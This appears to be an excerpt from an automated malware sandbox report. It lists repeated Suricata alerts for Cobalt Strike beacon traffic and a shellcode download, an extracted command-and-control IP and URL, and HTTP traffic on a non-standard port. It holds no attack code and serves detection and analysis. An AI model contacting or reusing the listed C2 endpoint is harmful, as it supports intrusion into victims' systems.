Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49843 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49862 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49828 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49821 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49785 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49804 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49842 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49827 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49867 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49868 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49848 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49844 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49824 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49832 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49861 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49829 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49873 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49851 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49826 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49871 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49863 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49890 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49889 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49864 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49837 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49878 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49846 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49850 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49859 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49887 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49884 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49847 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49901 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49896 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49838 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49865 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49891 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49794 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49905 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49845 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49915 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49916 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49849 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49839 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49928 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49895 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49919 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49825 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49858 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49913 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49877 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49860 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49806 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49897 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49933 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49909 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49882 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49879 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49875 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49885 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49805 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 79.124.58.130:7698 -> 192.168.2.8:49705
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49937 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49866 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49876 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49833 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49914 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49940 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49855 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49900 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49921 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49899 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49926 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49925 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49893 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49881 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49907 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49898 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49908 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49934 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49904 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49853 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49923 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49910 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49931 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49922 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49912 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49857 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49924 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49903 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49856 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49918 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49894 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49883 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49929 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49888 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49906 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49870 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49830 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49938 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49892 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49880 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49809 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49869 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49796 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49911 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49920 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49939 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49835 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49841 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49917 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49930 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49932 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49852 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49927 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49874 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49872 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49886 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49935 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49936 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49733 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49754 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49766 -> 79.124.58.130:7698
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.8:49902 -> 79.124.58.130:7698

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 79.124.58.130
Source: Malware configuration extractor	URLs: http://79.124.58.130/aiHK

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 7698
